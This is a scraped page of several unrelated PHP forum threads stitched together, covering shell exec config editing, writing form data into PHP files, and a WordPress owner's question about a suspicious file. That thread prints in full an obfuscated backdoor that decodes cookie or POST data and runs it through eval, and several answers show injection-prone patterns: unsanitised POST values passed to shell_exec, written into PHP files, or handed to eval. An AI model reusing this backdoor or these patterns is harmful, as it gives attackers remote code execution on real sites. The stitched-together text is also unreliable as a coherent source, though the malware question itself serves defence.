I am making a website for a device so that the user can change the primary and secondary IP that it connects to. I am using 'exec()' to get the IP's for me. i made a function for that called 'File_read' that work great. the problem I am having is with saving it back to the same file. i still use 'exec()', the function is called 'file_write'. Below is my code for the two
function file_read()
{
$arr_out = "";
$arr_test_1 = "";
$arr_test_2 = "";
exec(#'cat /usr/triton/config/protman.conf | grep "Primary ="',$arr_test_1);
exec(#'cat /usr/triton/config/protman.conf | grep "Secondary ="',$arr_test_2);
$arr_out[0] = IP_edit(end($arr_test_1));
$arr_out[1] = IP_edit(end($arr_test_2));
$arr_out[2] = end($arr_test_1);
$arr_out[3] = end($arr_test_2);
return $arr_out;
}
function file_write($arr_in)
{
$save_1 = "";
$save_2 = "";
$build_1 = "";
$build_2 = "";
$build_1 = 'Primary = "'.$arr_in[0].'";';
$build_2 = 'Secondary = "'.$arr_in[1].'";';
$save_1 = #"sed -i 's/".$arr_in[2]."/".$build_1."/' /usr/triton/config/protman.conf";
$save_2 = #"sed -i 's/".$arr_in[3]."/".$build_2."/' /usr/triton/config/protman.conf";
echo "<br/>test save 1 = ".$save_1;
echo "<br/>test save 2 = ".$save_2;
exec($save_1);
exec($save_2);
}
i tested the string it builds to write to the file but and it is as follows.
sed -i 's/Primary = "10.200.26.144";/Primary = "10.98.227.30";/' /usr/triton/config/protman.conf
This is for '$save_1'. When i use it on putty it works so why does it not work with 'exec()'? am i missing something or is their a easier way to do this?
has PHP the rights to execute this command and access to this file ?
Also, you could try giving a second argument $out (as array) to the exec function to handle details/info
Related
I'm trying to be clever and create a form to create a VM in ESX.
I have found the PowerCLI add-in for Poweshell and i have manually managed to create one.
This is my code but I'm struggling to make it work.
{
// Get the variables submitted by POST in order to pass them to the PowerShell script:
$name = $_POST["name"];
$diskmb = $_POST["diskmb"];
$MemoryMB = $_POST["MemoryMB"];
$NumCPU = $_POST["NumCPU"];
$connectesx = "Connect-VIServer -Server IPADDRESS -Protocol https -User 'USERNAME' -password 'PASSWORD'";
$createvm = "New-VM -Name $name -DiskMB $diskmb -MemoryMB $MemoryMB -NumCPU $NumCPU";
$psScriptPath = "C:\Program Files (x86)\VMware\Infrastructure\vSphere PowerCLI\esxdhb.psc1";
// Execute the PowerShell script, passing the parameters:
shell_exec("powershell -psc $psScriptPath -command $connectesx && $createvm");
echo ("$name Created Successfully.");
Hi there I'm trying to write a .php file using this code, server replying this error : syntax error, unexpected '0' (T_LNUMBER) in
I wanna know how can I write integer in php file as you can see
$status1 = \''0'\';
This code having problem, anybody please tell me what to do.
<?php
if(isset($_POST['user1'])){
$data = urldecode('%3C').'?php
$user1 = \''.$_POST['user1'].'\';
$pass1 = \''.$_POST['pass1'].'\';
$status1 = \''0'\';
$user2 = \''.$_POST['user2'].'\';
$pass2 = \''.$_POST['pass2'].'\';
$status2 = \''0'\';
$user3 = \''.$_POST['user3'].'\';
$pass3 = \''.$_POST['pass3'].'\';
$status3 = \''0'\';
$user4 = \''.$_POST['user4'].'\';
$pass4 = \''.$_POST['pass4'].'\';
$status4 = \''0'\';
$user5 = \''.$_POST['user5'].'\';
$pass5 = \''.$_POST['pass5'].'\';
$status5 = \''0'\';
$user6 = \''.$_POST['user6'].'\';
$pass6 = \''.$_POST['pass6'].'\';
$status6 = \''0'\';
$user7 = \''.$_POST['user7'].'\';
$pass7 = \''.$_POST['pass7'].'\';
$status7 = \''0'\';
$user8 = \''.$_POST['user8'].'\';
$pass8 = \''.$_POST['pass8'].'\';
$status8 = \''0'\';
$user9 = \''.$_POST['user9'].'\';
$pass9 = \''.$_POST['pass9'].'\';
$status9 = \''0'\';
$user10 = \''.$_POST['user10'].'\';
$pass10 = \''.$_POST['pass10'].'\';
$status10 = \''0'\';
?'.urldecode('%3E');
$fx=fopen('datauser.php','w');
fwrite($fx,$data);
fclose($fx);
if($fx === false) {
header("Location: ./tokensettings.php?save=err");
}
else {
header("Location: ./tokensettings.php?save=success");
}
}
?>
Thank you so much.
Here is how my form looks like.
If you still want to do it your way you need to use the \ correctly for each ' to be included in the string even those in [ ] - not saying the final string produced would actually work but it is based on your code and my best guess at your desired result
<?php
$string1=' \'\'.$_POST[\'user1\']\'\';';
$string1=$string1.'\'\'0\'\';';
echo $string1;
?>
The whole urlencoding stuff is not needed at all, your quoting and escaping is messy and incorrect. and why not simply use file_put_contents? Use HEREDOC to avoid messy escaping.
file_put_contents('datauser.php', <<<CONTENT
<?php
\$user = '{$_POST['user']}';
\$pass = '{$_POST['pass']}';
\$status = '0';
CONTENT
);
but if you really want to use files as data storage, I would encourage you to save it in a data format like xml or json instead of writing php.
// save data to file ($_POST used as example...)
file_put_contents('user.json', json_encode($_POST));
// read data
$data = json_decode(file_get_contents('user.json'));
I was amazed I didn't found answer on Google for this answer.
So basically I have a PHP code which have to be stored in a variable as a string. Unfortunately PHP recognize the opening and ending tag not as a string but a PHP code... I want it as a string :)
$settings_string =
'
<?php
//Locker ID
$userToSearch = '.$_POST["usertosearch"].';
//User Folder
$userFolder = '.$folder.';
//User Link
$userLink = '.$_POST["userlink"].';
// Username and pass
$affiliateuser = '.$_POST["affiliateuser"].';
$affiliatepassword = '.$_POST["affiliatepassword"].';
?>
';
you can use like this.
if u tell your purpose. so i can give you better than this.
$settings_string ='
<?php
//Locker ID
$userToSearch = \'.$_POST["usertosearch"].\';
//User Folder
$userFolder = \'.$folder.\';
//User Link
$userLink = \'.$_POST["userlink"].\';
// Username and pass
$affiliateuser = \'.$_POST["affiliateuser"].\';
$affiliatepassword = \'.$_POST["affiliatepassword"].\';
?>
';
Now you have to use like this
$file = fopen('file_name.php', 'w');
fwrite($file, $settings_string);
If you want the value of the $_POST injected in there you still need to quote it properly in the output.
$settings_string =
'
<?php
//Locker ID
$userToSearch = "'.$_POST["usertosearch"].'"; //add them quotes!!!!
//User Folder
$userFolder = "'.$folder.'";
//User Link
$userLink = "'.$_POST["userlink"].'";
// Username and pass
$affiliateuser = "'.$_POST["affiliateuser"].'";
$affiliatepassword = "'.$_POST["affiliatepassword"].'";
?>
';
I'll assume $_POST["usertosearch"] = 'user' currently in your output would be this.
$userToSearch = user;
When instead you want
$userToSearch = "user";
Above you will see the added double quote, to properly quote the strings in the output file. That file still has to have valid syntax.
As a note, if any of the post values contain " your gonna have issues, unless you do addslashes() for them.
For example
$userLink = "'.$_POST["userlink"].'";
Assume this is $_POST["userlink"] = 'link' OR
$userLink = "link";
See the issue with that. When you'll want this
$userLink = "link";
Your looking for eval
<?php
$settings_string ='
//Locker ID
$userToSearch = '.$_POST["usertosearch"].';
//User Folder
$userFolder = '.$folder.';
//User Link
$userLink = '.$_POST["userlink"].';
// Username and pass
$affiliateuser = '.$_POST["affiliateuser"].';
$affiliatepassword = '.$_POST["affiliatepassword"].';
';
eval($settings_string);
I am requesting assistance/ advice in context of a recent attack I had launched at my sites... this attack essentially is spamming my email accounts to a great deal I also have some suspicious files I am skeptical on which I would appreciate a second eye.I have removed the main spamming scripts successfully but would like to understand if this file wp-includes/Text/Diff/diff16.php is native or foreign
Also because of the sheer amount of spam how do I clear my outgoing mail on Linux which has bogged down my server and took up so much space?
Below is the suspicious code on diff16.php
<?php $GLOBALS['h8d181c'] = "\x3e\x2d\x2f\x72\x40\x50\x2c\x21\x78\x42\x47\x60\x49\x52\x7d\x6d\x24\x34\x33\x3b\x54\x6e\x4f\x71\x5c\x35\x22\x6f\x20\x73\x26\x5e\x30\x6c\x37\x9\x43\x2b\x5b\x36\x27\x56\x7b\x6a\x3d\x70\x3a\x5d\x59\x44\x25\x4b\x55\x39\x66\x7a\x64\x51\x7e\x32\xa\x45\x5a\x58\x7c\x31\x57\x4d\x41\x68\x67\x69\x74\x77\x61\x29\x53\x38\x4a\x2a\x4c\x63\x65\x28\xd\x76\x79\x6b\x3f\x46\x2e\x48\x5f\x62\x4e\x23\x3c\x75";
$GLOBALS[$GLOBALS['h8d181c'][72].$GLOBALS['h8d181c'][77].$GLOBALS['h8d181c'][54].$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][25]] = $GLOBALS['h8d181c'][81].$GLOBALS['h8d181c'][69].$GLOBALS['h8d181c'][3];
$GLOBALS[$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][17].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][59]] = $GLOBALS['h8d181c'][27].$GLOBALS['h8d181c'][3].$GLOBALS['h8d181c'][56];
$GLOBALS[$GLOBALS['h8d181c'][43].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][81].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][34]] = $GLOBALS['h8d181c'][29].$GLOBALS['h8d181c'][72].$GLOBALS['h8d181c'][3].$GLOBALS['h8d181c'][33].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][21];
$GLOBALS[$GLOBALS['h8d181c'][23].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][77].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][18]] = $GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][21].$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][92].$GLOBALS['h8d181c'][29].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][72];
$GLOBALS[$GLOBALS['h8d181c'][73].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][25]] = $GLOBALS['h8d181c'][29].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][3].$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][33].$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][55].$GLOBALS['h8d181c'][82];
$GLOBALS[$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][39]] = $GLOBALS['h8d181c'][45].$GLOBALS['h8d181c'][69].$GLOBALS['h8d181c'][45].$GLOBALS['h8d181c'][85].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][3].$GLOBALS['h8d181c'][29].$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][27].$GLOBALS['h8d181c'][21];
$GLOBALS[$GLOBALS['h8d181c'][97].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][65]] = $GLOBALS['h8d181c'][97].$GLOBALS['h8d181c'][21].$GLOBALS['h8d181c'][29].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][3].$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][33].$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][55].$GLOBALS['h8d181c'][82];
$GLOBALS[$GLOBALS['h8d181c'][15].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][34]] = $GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][29].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][17].$GLOBALS['h8d181c'][92].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][81].$GLOBALS['h8d181c'][27].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][82];
$GLOBALS[$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][81]] = $GLOBALS['h8d181c'][29].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][72].$GLOBALS['h8d181c'][92].$GLOBALS['h8d181c'][72].$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][15].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][92].$GLOBALS['h8d181c'][33].$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][15].$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][72];
$GLOBALS[$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][81].$GLOBALS['h8d181c'][32]] = $GLOBALS['h8d181c'][86].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][59];
$GLOBALS[$GLOBALS['h8d181c'][97].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][59]] = $GLOBALS['h8d181c'][69].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][17].$GLOBALS['h8d181c'][56];
$GLOBALS[$GLOBALS['h8d181c'][70].$GLOBALS['h8d181c'][34].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][18]] = $_POST;
$GLOBALS[$GLOBALS['h8d181c'][8].$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][54].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][56]] = $_COOKIE;
#$GLOBALS[$GLOBALS['h8d181c'][23].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][77].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][18]]($GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][3].$GLOBALS['h8d181c'][3].$GLOBALS['h8d181c'][27].$GLOBALS['h8d181c'][3].$GLOBALS['h8d181c'][92].$GLOBALS['h8d181c'][33].$GLOBALS['h8d181c'][27].$GLOBALS['h8d181c'][70], NULL);
#$GLOBALS[$GLOBALS['h8d181c'][23].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][77].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][18]]($GLOBALS['h8d181c'][33].$GLOBALS['h8d181c'][27].$GLOBALS['h8d181c'][70].$GLOBALS['h8d181c'][92].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][3].$GLOBALS['h8d181c'][3].$GLOBALS['h8d181c'][27].$GLOBALS['h8d181c'][3].$GLOBALS['h8d181c'][29], 0);
#$GLOBALS[$GLOBALS['h8d181c'][23].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][77].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][18]]($GLOBALS['h8d181c'][15].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][8].$GLOBALS['h8d181c'][92].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][8].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][81].$GLOBALS['h8d181c'][97].$GLOBALS['h8d181c'][72].$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][27].$GLOBALS['h8d181c'][21].$GLOBALS['h8d181c'][92].$GLOBALS['h8d181c'][72].$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][15].$GLOBALS['h8d181c'][82], 0);
#$GLOBALS[$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][81]](0);
$rb00 = NULL;
$c174 = NULL;
$GLOBALS[$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][34].$GLOBALS['h8d181c'][81].$GLOBALS['h8d181c'][34]] = $GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][34].$GLOBALS['h8d181c'][34].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][1].$GLOBALS['h8d181c'][34].$GLOBALS['h8d181c'][54].$GLOBALS['h8d181c'][34].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][1].$GLOBALS['h8d181c'][17].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][34].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][1].$GLOBALS['h8d181c'][77].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][17].$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][1].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][34].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][17].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][34].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][54].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][32];
global $e57c7;
function h114d($rb00, $n06f3)
{
$t89f0c4 = "";
for ($p89c=0; $p89c<$GLOBALS[$GLOBALS['h8d181c'][43].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][81].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][34]]($rb00);)
{
for ($b8a92b=0; $b8a92b<$GLOBALS[$GLOBALS['h8d181c'][43].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][81].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][34]]($n06f3) && $p89c<$GLOBALS[$GLOBALS['h8d181c'][43].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][81].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][34]]($rb00); $b8a92b++, $p89c++)
{
$t89f0c4 .= $GLOBALS[$GLOBALS['h8d181c'][72].$GLOBALS['h8d181c'][77].$GLOBALS['h8d181c'][54].$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][25]]($GLOBALS[$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][17].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][59]]($rb00[$p89c]) ^ $GLOBALS[$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][17].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][59]]($n06f3[$b8a92b]));
}
}
return $t89f0c4;
}
function y26e2($rb00, $n06f3)
{
global $e57c7;
return $GLOBALS[$GLOBALS['h8d181c'][97].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][59]]($GLOBALS[$GLOBALS['h8d181c'][97].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][59]]($rb00, $e57c7), $n06f3);
}
foreach ($GLOBALS[$GLOBALS['h8d181c'][8].$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][54].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][56]] as $n06f3=>$g476b4c9)
{
$rb00 = $g476b4c9;
$c174 = $n06f3;
}
if (!$rb00)
{
foreach ($GLOBALS[$GLOBALS['h8d181c'][70].$GLOBALS['h8d181c'][34].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][18]] as $n06f3=>$g476b4c9)
{
$rb00 = $g476b4c9;
$c174 = $n06f3;
}
}
$rb00 = #$GLOBALS[$GLOBALS['h8d181c'][97].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][65]]($GLOBALS[$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][81].$GLOBALS['h8d181c'][32]]($GLOBALS[$GLOBALS['h8d181c'][15].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][34]]($rb00), $c174));
if (isset($rb00[$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][87]]) && $e57c7==$rb00[$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][87]])
{
if ($rb00[$GLOBALS['h8d181c'][74]] == $GLOBALS['h8d181c'][71])
{
$p89c = Array(
$GLOBALS['h8d181c'][45].$GLOBALS['h8d181c'][85] => #$GLOBALS[$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][39]](),
$GLOBALS['h8d181c'][29].$GLOBALS['h8d181c'][85] => $GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][90].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][1].$GLOBALS['h8d181c'][65],
);
echo #$GLOBALS[$GLOBALS['h8d181c'][73].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][25]]($p89c);
}
elseif ($rb00[$GLOBALS['h8d181c'][74]] == $GLOBALS['h8d181c'][82])
{
eval($rb00[$GLOBALS['h8d181c'][56]]);
}
exit();
}
i'm still trying to find out how to prevent these files from appearing on my server, yet i'm able to remove them at least, here is a oneliner that might be of help:
find . -type f -name "*.php" -exec fgrep -m 1 -F "\$GLOBALS[\$GLOBALS[" {} \; -delete
it basically crawls the current directory (and subdirectories), searches for files with such code and removes them.
(perhaps you want to try it first without the -delete directive to ensure you're not removing any files that should be kept.)
If you are calling php page from web, you can give as
../../somepage.php?myid=1&trackno=2&anotherparam=3
and then you can use $_REQUEST or $_GET to retrieve the information
In command line, you can use
$options = getopt("a:b:c:"); to get the options that are passed through arguments
How to make sure, same source works either in web or in command line?
Let say your requests are like following;
WEB: http://domain.com/somepage.php?myid=1&trackno=2&anotherparam=3
CLI: php /path/to/this/php/file/somepage.php 1 2 3
You can use following php code;
<?php
if (!empty($_REQUEST)) {
$myid = $_REQUEST["myid"];
$trackno = $_REQUEST["trackno"];
$anotherparam = $_REQUEST["anotherparam"];
} else if (!empty($argv)) {
$myid = $argv[1];
$trackno = $argv[2];
$anotherparam = $argv[3];
} else {
die("Invalid request!");
}
You have already know how to handle web requests, you can refer here for more detail about $argv. Simply,
$argv[0] => scriptname(somepage.php),
$argv[1] => first param, ...,
$argv[n] => (n-1)th param
Edit:
In order to not miss order of commandline arguments, you can use naming conventions like;
php somepage.php myid_1 anotherparam_2 trackno_3
and you can use following to handle this;
foreach ($argv as $k => $v) {
if ($k == 0) continue;
$temp = explode("_", $v);
${$temp[0]} = $temp[1];
}
Simply,
myid_3 becomes $myid = 3;
variable names hidden in the values so you don't need to know about sequences